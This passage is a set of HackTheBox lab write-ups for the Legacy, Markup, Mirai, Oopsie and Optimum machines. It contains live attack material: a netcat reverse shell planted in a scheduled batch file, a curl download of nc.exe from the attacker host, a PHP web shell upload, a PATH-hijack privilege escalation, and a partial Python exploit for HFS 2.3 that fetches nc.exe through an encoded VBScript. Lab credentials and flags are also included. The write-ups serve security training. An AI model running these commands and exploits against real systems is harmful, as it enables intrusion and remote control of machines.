43 | Googling for "`windows xp windows 2000 manager vulnerability`", we literally get hundreds of results all pointing towards `MS08-067 - Critical: Vulnerability in Server Service Could Allow Remote Code Execution`.
44 |
45 | Using searchsploit, we also get a list of already existing exploits for this vulnerability.
46 |
47 | Therefore, I decided to use metasploit, to make things easier (this time at least).
48 |
49 | 
50 |
51 | Metasploit already offers us a module for this vulnerability. Let's use it!
52 |
53 | Settings should be defined as follows (insert your IP into LHOST):
54 |
55 | 
56 |
57 | After exeucting the exploit, we receive a meterpreter shell:
58 |
59 | 
60 |
61 | Now what's left is to obtain the user and root flag.
62 | There are several way how to do that. I decided to go for the simply `shell` spawn and search for them manually.
63 |
64 | ## Post Exploitation
65 |
66 | User Flag:
67 | ```
68 | C:\Documents and Settings\john\Desktop>type user.txt
69 | type user.txt
70 | e69af0e4f443de7e36876fda4ec7644f
71 | ```
72 |
73 | Root Flag:
74 | ```
75 | C:\Documents and Settings\Administrator\Desktop>type root.txt
76 | type root.txt
77 | 993442d258b0e0ec917cae9e695d5713
78 | ```
--------------------------------------------------------------------------------
/Legacy/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Legacy/pics/logo.png
--------------------------------------------------------------------------------
/Legacy/pics/metasploit_ms08-067.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Legacy/pics/metasploit_ms08-067.png
--------------------------------------------------------------------------------
/Legacy/pics/module_options.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Legacy/pics/module_options.png
--------------------------------------------------------------------------------
/Legacy/pics/system_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Legacy/pics/system_shell.png
--------------------------------------------------------------------------------
/Markup/README.md:
--------------------------------------------------------------------------------
1 | # Starting Point - Markup
2 |
3 | ## Enumeration
4 |
5 | ```
6 | rustscan 10.10.10.49 -- -sC -sV -o port_scan
7 |
8 | PORT STATE SERVICE REASON
9 | 22/tcp open ssh syn-ack
10 | 80/tcp open http syn-ack
11 | 443/tcp open https syn-ack
12 | ```
13 |
14 | ### Examine Port 80 - Apache Server
15 |
16 | 
17 |
18 | When accessing the open port 80 via a browser, we can see a login page. In the previous machine (Included), we found the credentials `Daniel:>SNDv*2wzLWf` stored in a SQL dump. Using them, we can successfully login and we are redirected to the application's website, which seems to be some kind of online store / delivery service.
19 | 
20 |
21 | The website provides several functionalities, one of which is for submitting orders.
22 |
23 | 
24 |
25 | When submitting an order (with test data), and intercepting the request with Burpsuite, we can see that the content is XML.
26 |
27 | 
28 |
29 | There is a good chance of an XXE (XML External Entity) vulnerability. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
30 |
31 | Let's try it:
32 |
33 | 
34 |
35 | Perfect! It works.
36 |
37 | Now what can we do? We know that there is an open SSH port. And we also know that `Daniel` is a valid user. Maybe we can leak the private SSH key and use it to connect to the server.
38 |
39 | 
40 |
41 | Using this key as the identitfier for the ssh connection we get access to the machine!
42 |
43 | ```
44 | Microsoft Windows [Version 10.0.17763.107]
45 | (c) 2018 Microsoft Corporation. All rights reserved.
46 |
47 | daniel@MARKUP C:\Users\daniel>whoami
48 | markup\daniel
49 | ```
50 |
51 | ## Exploitation
52 |
53 | Enumerating the system, reveals a script named `job.bat` which is located in the `C:\Log-Management` directory:
54 |
55 | ```
56 | daniel@MARKUP C:\Log-Management>type job.bat
57 | @echo off
58 | FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
59 | IF (%adminTest%)==(Access) goto noAdmin
60 | for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
61 | echo.
62 | echo Event Logs have been cleared!
63 | goto theEnd
64 | :do_clear
65 | wevtutil.exe cl %1
66 | goto :eof
67 | :noAdmin
68 | echo You must run this script as an Administrator!
69 | :theEnd
70 | exit
71 | ```
72 |
73 | Looking at the permissions, we see that the group `BUILTIN\Users` has full control (F) over the file. This also includes our current user daniel.
74 |
75 | ```
76 | daniel@MARKUP C:\Log-Management>icacls job.bat
77 | job.bat BUILTIN\Users:(F)
78 | NT AUTHORITY\SYSTEM:(I)(F)
79 | BUILTIN\Administrators:(I)(F)
80 | BUILTIN\Users:(I)(RX)
81 | ```
82 |
83 | The idea is to replace the current code with a reverse shell, which will then be executed by an administrator (similar to cron jobs on unix). But therefore, we first must upload the nc.exe so that we can establish a reverse shell.
84 |
85 | ```
86 | curl http://10.10.14.15/nc.exe -o c:\users\daniel\nc.exe
87 |
88 | echo C:\Users\daniel\nc.exe -e cmd.exe 10.10.14.15 4444 > C:\Log-Management\job.bat
89 | ```
90 |
91 | Now we wait and eventually receive a root-shell:
92 |
93 | 
94 |
95 | Final step is to obtain the root flag: `f574a3e7650cebd8c39784299cb570f8`
96 |
--------------------------------------------------------------------------------
/Markup/pics/burp-order.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/burp-order.png
--------------------------------------------------------------------------------
/Markup/pics/delivery.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/delivery.png
--------------------------------------------------------------------------------
/Markup/pics/login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/login.png
--------------------------------------------------------------------------------
/Markup/pics/order.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/order.png
--------------------------------------------------------------------------------
/Markup/pics/rootshell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/rootshell.png
--------------------------------------------------------------------------------
/Markup/pics/ssh_key_leak.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/ssh_key_leak.png
--------------------------------------------------------------------------------
/Markup/pics/xxe_proof.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/xxe_proof.png
--------------------------------------------------------------------------------
/Mirai/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # Mirai (Linux)
4 |
5 | ## Enumeration
6 |
7 | ```
8 | rustscan --ulimit 5000 10.129.82.32 -- -sV -o port_scan
9 |
10 | PORT STATE SERVICE REASON VERSION
11 | 22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
12 | 53/tcp open domain syn-ack dnsmasq 2.76
13 | 80/tcp open http syn-ack lighttpd 1.4.35
14 | 1879/tcp open upnp syn-ack Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
15 | 32400/tcp open http syn-ack Plex Media Server httpd
16 | 32469/tcp open upnp syn-ack Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
17 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
18 | ```
19 |
20 | ### Examine Port 80 - lighttpd Server
21 |
22 | Accessing port 80 via the browser, leaves us with an empty page. Using gobuster we discover an interesting directory as well as a javascript file.
23 |
24 | ```
25 | └──╼ $ gobuster dir -u "10.129.82.32" -w /usr/share/wordlists/dirb/common.txt
26 | ===============================================================
27 | Gobuster v3.0.1
28 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
29 | ===============================================================
30 | [+] Url: http://10.129.82.32
31 | [+] Threads: 10
32 | [+] Wordlist: /usr/share/wordlists/dirb/common.txt
33 | [+] Status codes: 200,204,301,302,307,401,403
34 | [+] User Agent: gobuster/3.0.1
35 | [+] Timeout: 10s
36 | ===============================================================
37 | 2021/01/19 12:48:53 Starting gobuster
38 | ===============================================================
39 | /admin (Status: 301)
40 | /swfobject.js (Status: 200)
41 | ===============================================================
42 | 2021/01/19 12:49:18 Finished
43 | ===============================================================
44 | ```
45 |
46 | Taking a look at the admin directory (via the browser), we see the default config page for Pi-hole.
47 |
48 | 
49 |
50 | Pi-hole is a Linux network-level advertisement and Internet tracker blocking application which acts as a DNS sinkhole and optionally a DHCP server, intended for use on a private network.
51 |
52 | ## Gaining an Initial Foothold
53 |
54 | As Pi-holes are usually installed on a Raspberry Pi, I tried to login as the default user via ssh (pi:raspberry). And it worked!
55 |
56 | ```
57 | pi@raspberrypi:~ $ id
58 | uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)
59 | ```
60 |
61 | ## Privilege Escalation
62 |
63 | We also see that pi is in the sudo group.
64 |
65 | ```
66 | pi@raspberrypi:~ $ sudo -l
67 | Matching Defaults entries for pi on localhost:
68 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
69 |
70 | User pi may run the following commands on localhost:
71 | (ALL : ALL) ALL
72 | (ALL) NOPASSWD: ALL
73 | ```
74 |
75 | So gaining a root shell is also very easy:
76 |
77 | ```
78 | pi@raspberrypi:~ $ su -
79 | Password: raspberry
80 |
81 | SSH is enabled and the default password for the 'pi' user has not been changed.
82 | This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
83 |
84 |
85 | SSH is enabled and the default password for the 'pi' user has not been changed.
86 | This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
87 |
88 | root@raspberrypi:~# id
89 | uid=0(root) gid=0(root) groups=0(root)
90 | ```
91 |
92 | So basically we have pwned the machine. Atleast that's what I thought. When trying to read the root flag it states:
93 |
94 | ```
95 | root@raspberrypi:~# cat /root/root.txt
96 | I lost my original root.txt! I think I may have a backup on my USB stick...
97 | ```
98 |
99 | Hm ok... Let's inspect the various filesystems on the machine to see if we can find something interesting:
100 |
101 | ```
102 | root@raspberrypi:~# df -h
103 | Filesystem Size Used Avail Use% Mounted on
104 | aufs 8.5G 2.8G 5.3G 34% /
105 | tmpfs 100M 4.8M 96M 5% /run
106 | /dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1
107 | /dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs
108 | tmpfs 250M 0 250M 0% /lib/live/mount/overlay
109 | /dev/sda2 8.5G 2.8G 5.3G 34% /lib/live/mount/persistence/sda2
110 | devtmpfs 10M 0 10M 0% /dev
111 | tmpfs 250M 8.0K 250M 1% /dev/shm
112 | tmpfs 5.0M 4.0K 5.0M 1% /run/lock
113 | tmpfs 250M 0 250M 0% /sys/fs/cgroup
114 | tmpfs 250M 8.0K 250M 1% /tmp
115 | /dev/sdb 8.7M 93K 7.9M 2% /me
116 | ```
117 |
118 | We see the filesystem /dev/sdb which has been mounted on /media/usbstick. A USBSTICK! That's what we are looking for.
119 |
120 | ```
121 | root@raspberrypi:/media/usbstick# ls
122 | damnit.txt lost+found
123 | root@raspberrypi:/media/usbstick# cat damnit.txt
124 | Damnit! Sorry man I accidentally deleted your files off the USB stick.
125 | Do you know if there is any way to get them back?
126 |
127 | -James
128 | ```
129 |
130 | Hmm... So what now? Maybe we are lucky and the files are deleted but not yet overwritten. A further assumption is, that the flag is a human readable string as in the other challenges. If so, we can try to run `strings` on `/dev/sdb` to see if the flag is still in memory.
131 |
132 | ```
133 | root@raspberrypi:~# strings /dev/sdb
134 | >r &
135 | /media/usbstick
136 | lost+found
137 | root.txt
138 | damnit.txt
139 | >r &
140 | >r &
141 | /media/usbstick
142 | lost+found
143 | root.txt
144 | damnit.txt
145 | >r &
146 | /media/usbstick
147 | 2]8^
148 | lost+found
149 | root.txt
150 | damnit.txt
151 | >r &
152 | 3d3e483143ff12ec505d026fa13e020b
153 | Damnit! Sorry man I accidentally deleted your files off the USB stick.
154 | Do you know if there is any way to get them back?
155 | -James
156 | ```
157 |
158 | There it is! A suspicious string that looks like a flag. Let's try to submit it ... And it works! Machine pwned!
159 |
160 |
161 |
162 |
--------------------------------------------------------------------------------
/Mirai/pics/admin_website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Mirai/pics/admin_website.png
--------------------------------------------------------------------------------
/Mirai/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Mirai/pics/logo.png
--------------------------------------------------------------------------------
/Oopsie/README.md:
--------------------------------------------------------------------------------
1 | # Starting Point - Oopsie
2 |
3 | ## Enumeration
4 | ```
5 | rustscan 10.10.10.28 -- -sC -sV
6 |
7 | PORT STATE SERVICE REASON VERSION
8 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
9 | 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
10 | | http-methods:
11 | |_ Supported Methods: GET HEAD POST OPTIONS
12 | |_http-server-header: Apache/2.4.29 (Ubuntu)
13 | |_http-title: Welcome
14 | ```
15 |
16 | ### Examine Port 80 - Apache server
17 |
18 | 
19 |
20 | It seems to be a website for the electric vehicle manufacturer MegaCorp (which we also had in the previous Task "Archetype").
21 |
22 | 
23 |
24 | Scrolling down the website, we find a hint for a login page. As the website UI does not provide any login functionality, we have probably have to find it first. Therefore, we open Burpsuite and check the sitemap of the website. Alternatively we could also use a tool like `gobuster`or `dirbuster` for this as well.
25 |
26 | 
27 |
28 | The sitemap reveals that there is a directory called `/cdn-cgi/login/` and the related `/cdn-cgi/login/index.php`.
29 |
30 | 
31 |
32 | Opening this file via the webbrowser, we can confirm that this is a login page.
33 |
34 | The next step is to bruteforce the username/password and hope that it is weak. However, using `Hydra` or `Burpsuite Intruder` led to nothing, as the username/password combiniation is unfortunately not included in a common wordlist like `rockyou.txt`. I was pretty much stuck at this point and after a while, I looked it up in a writeup. The password is `MEGACORP_4dm1n!!` (from the previous challenge ... never would have thought of that) and a weak username.
35 |
36 | 
37 |
38 | Once logged in, we have full access (as we are admin) to the Repair Management System website.
39 |
40 | 
41 |
42 | We have access to the account information of the admin (Access ID: 34322, Name: admin, Email: admin@megacorp.com)
43 |
44 | 
45 |
46 | We have information about the Branding.
47 |
48 | 
49 |
50 | As well as information about clients.
51 |
52 | 
53 |
54 | But when we try to access the `Uploads`, it says we require super admin rights. Hmmm ....
55 |
56 | After investigating all the source code and the network communication, I realized that when logging in as admin, two cookies are being set.
57 |
58 | 
59 |
60 | 1) `user=34322; expires=Sat, 30-Jan-2021 14:17:15 GMT; Max-Age=2592000; path=/`
61 | 2) `role=admin; expires=Sat, 30-Jan-2021 14:17:15 GMT; Max-Age=2592000; path=/`
62 |
63 | So apparently, the user- and role-management is done via plaintext cookies. Great idea! (sarcasm off). Perfect chance for us to gain super admin privileges. I quickly realized that the `user=34322` part seemed to be familiar. We have seen that number before on the admin's account info page. It's the Access ID of the admin.
64 |
65 |
66 | 
67 |
68 | Going back to the account info page, I realized that there is an `id` parameter in the URL. 1 seems to be the Admin. Can we get information about the super admin user, if we can guess its id? Let's try that.
69 |
70 | We have several options for that:
71 |
72 | 1) Burpsuite Sniper
73 | 2) Hydra
74 | 3) Writing a script (requesting the URLs and check the content)
75 |
76 | 
77 |
78 | With Burpsuite it's fairly easy to do. Simply intercept the response to the Account info page, send it to the Intruder, select `Sniper` and add the `id` value to the fields that should be bruteforced. After that, simply set the payload to a list of integers (e.g 0-1000).
79 |
80 | However, I decided to practice my Python skills and write my own script for that.
81 |
82 | ```python
83 | import requests
84 | url = "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id="
85 |
86 | print("[+] Starting the process")
87 |
88 | payload = {
89 | 'username' : 'admin',
90 | 'password' : 'MEGACORP_4dm1n!!'
91 | }
92 |
93 | with requests.Session() as s:
94 | p = s.post('http://10.10.10.28/cdn-cgi/login/index.php', data=payload)
95 | for x in range(1000):
96 | print(f"[+] Testing id: {x}")
97 | test_url = url + str(x)
98 | res = s.get(test_url)
99 | if 'super' in res.text:
100 | print(f"[+] SUPER ADMIN ID FOUND: {x}")
101 | break
102 |
103 | print("[+] Stopping the process")
104 | ```
105 |
106 | Running the code, will tell us that Super Admin ID is 30, as the response contains the word `super` (This obviously only works, as I've assumed that super is somewhere contained in the response. If that were not the case, then the script wouldn't work and I would have to go through each request manually or check for other words/find a regex to match the account id).
107 |
108 | 
109 |
110 | Looking at the page with the `id` parameter set to 30, we can see the account info of the super admin user. The access ID is `86575`. We change our cookie accordingly and now try to access the `Uploads` page. It works!
111 |
112 | 
113 |
114 | Trying to upload a php shell called `shell.php` succeeds.
115 |
116 | 
117 |
118 | During our sitemap-enumaration with Burpsuite, we found a directory called `/uploads`. It probably contains the uploaded file.
119 |
120 | 
121 |
122 | Starting a listener on port 4444 with `nc -lvnp 4444`and then accessing the file on `10.10.10.28/uploads/shell.php`, gives us a reverse shell to the machine.
123 |
124 | First step is always to stablize the shell, so that we can't accidently close the connection if we press something like CTRL+C.
125 |
126 | To fully stablize the shell and enable features like autocomplete we can do following:
127 | ```
128 | python3 -c 'import pty; pty.spawn("/bin/bash")'
129 |
130 | CTRL + Z (to put the nc process into the background)
131 |
132 | stty raw -echo; fg
133 | ```
134 |
135 | Now you should have a fully stablized shell.
136 |
137 | ## On-Machine Enumeration
138 |
139 | ### Other home directories
140 |
141 | ```
142 | www-data@oopsie:/home$ ls -la
143 | total 12
144 | drwxr-xr-x 3 root root 4096 Jan 23 2020 .
145 | drwxr-xr-x 24 root root 4096 Jan 27 2020 ..
146 | drwxr-xr-x 5 robert robert 4096 Feb 25 2020 robert
147 | ```
148 | Inspecting the home directories, we can see another user called `robert`. His home directory contains the `user.txt` flag.
149 |
150 | | f2c74ee8db7983851ab2a96a44eb7981 |
151 |
152 | ### Files with SUID
153 |
154 | ```
155 | www-data@oopsie:/$ find / -perm -u=s -type f 2>/dev/null | grep -v "snap"
156 | /bin/fusermount
157 | /bin/umount
158 | /bin/mount
159 | /bin/ping
160 | /bin/su
161 | /usr/lib/dbus-1.0/dbus-daemon-launch-helper
162 | /usr/lib/openssh/ssh-keysign
163 | /usr/lib/eject/dmcrypt-get-device
164 | /usr/lib/policykit-1/polkit-agent-helper-1
165 | /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
166 | /usr/bin/newuidmap
167 | /usr/bin/passwd
168 | /usr/bin/at
169 | /usr/bin/bugtracker <-- seems suspicious
170 | /usr/bin/newgrp
171 | /usr/bin/pkexec
172 | /usr/bin/chfn
173 | /usr/bin/chsh
174 | /usr/bin/traceroute6.iputils
175 | /usr/bin/newgidmap
176 | /usr/bin/gpasswd
177 | /usr/bin/sudo
178 | ```
179 |
180 | `-perm -u=s`: Permission, where SUID Bit is set
181 |
182 | `-type f` : Only show files
183 |
184 | `2>/dev/null`: Dump any error message in /dev/null
185 |
186 | `grep -v snap`: remove all findings that contain snap (avoids a lot of spamming)
187 |
188 | ```
189 | www-data@oopsie:/$ ls -la /usr/bin/bugtracker
190 | -rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
191 | ```
192 | However, we have no access to the file. So this is a dead end.
193 |
194 | ### Check www-data files of the website
195 |
196 | We should probably check out the other files of the website. Maybe we have missed something. And indeed! There is a `db.php` file containing credentials for the user `robert` which we've already found.
197 |
198 | ```
199 | www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
200 |
203 | ```
204 |
205 | So let's try to gain access to the user `robert` with the password `M3g4C0rpUs3r!`. And it works!
206 |
207 | ```
208 | robert@oopsie:/var/www/html/cdn-cgi/login$ id
209 | uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
210 | ```
211 |
212 | Robert is also member of the `bugtracker` group, so we can now further investigate the `bugtracker` binary.
213 |
214 | Running the binary with input `1` outputs following:
215 | ```
216 | robert@oopsie:/var/www/html/cdn-cgi/login$ bugtracker
217 |
218 | ------------------
219 | : EV Bug Tracker :
220 | ------------------
221 |
222 | Provide Bug ID: 1
223 | ---------------
224 |
225 | Binary package hint: ev-engine-lib
226 |
227 | Version: 3.3.3-1
228 |
229 | Reproduce:
230 | When loading library in firmware it seems to be crashed
231 |
232 | What you expected to happen:
233 | Synchronized browsing to be enabled since it is enabled for that site.
234 |
235 | What happened instead:
236 | Synchronized browsing is disabled. Even choosing VIEW > SYNCHRONIZED BROWSING from menu does not stay enabled between connects.
237 | ```
238 |
239 | Let's try some weird input like a negative number:
240 |
241 | ```
242 | robert@oopsie:/var/www/html/cdn-cgi/login$ bugtracker
243 |
244 | ------------------
245 | : EV Bug Tracker :
246 | ------------------
247 |
248 | Provide Bug ID: -1
249 | ---------------
250 |
251 | cat: /root/reports/-1: No such file or directory
252 | ```
253 |
254 | So it's bascially just appending our input to a directory string... we can modify it in such a way, that it will print the root.txt for us.
255 |
256 | ```
257 | robert@oopsie:/var/www/html/cdn-cgi/login$ bugtracker
258 |
259 | ------------------
260 | : EV Bug Tracker :
261 | ------------------
262 |
263 | Provide Bug ID: ../root.txt
264 | ---------------
265 |
266 | af13b0bee69f8a877c3faf667f7beacf
267 | ```
268 | There we go. We pwned the machine.
269 |
270 | ## Post Exploitation
271 |
272 | For the next challenge we need FTP credentials, which are stored in this file:
273 |
274 | ```
275 | root@oopsie:/root/.config/filezilla# more filezilla.xml
276 |
277 |
278 |
279 |
280 | 10.10.10.46
281 | 21
282 | 0
283 | 0
284 | ftpuser
285 | mc@F1l3ZilL4
286 | 1
287 | 0
288 | MODE_DEFAULT
289 | 0
290 | Auto
291 | 0
292 |
293 |
294 |
295 | ```
296 |
297 | Either "guess" this common filename or extend the privilege escalation by doing following:
298 |
299 | As we know that the bugtracker binary calls `cat filename`, we can simply modify the cat binary for our user.
300 |
301 | ```
302 | export PATH=/tmp/:$PATH
303 |
304 | cd /tmp && echo '/bin/bash' > cat && chmod +x cat
305 | ```
306 |
307 | Now when executing the `bugtracker` binary, we get a root-shell.
308 |
309 |
--------------------------------------------------------------------------------
/Oopsie/pics/accounting.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/accounting.png
--------------------------------------------------------------------------------
/Oopsie/pics/accounts_uri.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/accounts_uri.png
--------------------------------------------------------------------------------
/Oopsie/pics/apache_website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/apache_website.png
--------------------------------------------------------------------------------
/Oopsie/pics/branding.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/branding.png
--------------------------------------------------------------------------------
/Oopsie/pics/burpsuite_sitemap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/burpsuite_sitemap.png
--------------------------------------------------------------------------------
/Oopsie/pics/burpsuite_sniper.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/burpsuite_sniper.png
--------------------------------------------------------------------------------
/Oopsie/pics/clients.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/clients.png
--------------------------------------------------------------------------------
/Oopsie/pics/cookies.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/cookies.png
--------------------------------------------------------------------------------
/Oopsie/pics/hint_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/hint_login.png
--------------------------------------------------------------------------------
/Oopsie/pics/logged_in.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/logged_in.png
--------------------------------------------------------------------------------
/Oopsie/pics/login_page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/login_page.png
--------------------------------------------------------------------------------
/Oopsie/pics/shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/shell.png
--------------------------------------------------------------------------------
/Oopsie/pics/super_admin_info.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/super_admin_info.png
--------------------------------------------------------------------------------
/Oopsie/pics/upload_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/upload_shell.png
--------------------------------------------------------------------------------
/Oopsie/pics/uploads.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/uploads.png
--------------------------------------------------------------------------------
/Oopsie/pics/uploads_page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Oopsie/pics/uploads_page.png
--------------------------------------------------------------------------------
/Optimum/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # Optimum (Windows)
4 |
5 | ## Enumeration
6 |
7 | ```
8 | rustscan --ulimit 5000 10.129.1.127 -- -sC -sV -o port_scan
9 |
10 | PORT STATE SERVICE REASON VERSION
11 | 80/tcp open http syn-ack HttpFileServer httpd 2.3
12 | |_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
13 | | http-methods:
14 | |_ Supported Methods: GET HEAD POST
15 | |_http-server-header: HFS 2.3
16 | |_http-title: HFS /
17 | Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
18 | ```
19 |
20 | Looking at the open port 80 via the Browser, we see following page:
21 |
22 | 
23 |
24 | The server is hosting a HTTPFileServer version 2.3. Doing some research shows, that this specific version has some kind of Remote Code Injection vulnerability.
25 |
26 | ## Exploitation
27 |
28 | The version of the File server uses a library `ParserLib.pas`, which contains a vulnerable function `findMacroMarker`
29 |
30 | ```
31 | function findMacroMarker(s:string; ofs:integer=1):integer;
32 | begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
33 | ```
34 |
35 | *"Rejetto HFS versions 2.3, 2.3a, and 2.3b are vulnerable to remote command execution due to a regular expression in parserLib.pas that fails to handle null bytes. Commands that follow a null byte in the search string are executed on the host system.* " (https://www.kb.cert.org/vuls/id/251276)
36 |
37 | Such a command must be written in the HFS scripting language format. E.g commands can be executed as follows:
38 |
39 | ```
40 | http://localhost:80/?search=%00{.exec|.}
41 | ```
42 |
43 | This will stop the regex from parsing the macro and instead execute the command.
44 |
45 |
46 | To abuse the vulnerability, I used this script here (might have to execute it several times). You also need to start a http server, from which the script then can download the `nc.exe`, in order to create a reverse shell to your machine.
47 |
48 | ```python
49 | import urllib2
50 | import sys
51 |
52 | try:
53 | def script_create():
54 | urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
55 |
56 | def execute_script():
57 | urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
58 |
59 | def nc_run():
60 | urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
61 |
62 | ip_addr = "10.10.14.26" #local IP address
63 | local_port = "4444" # Local Port number
64 | vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
65 | save= "save|" + vbs
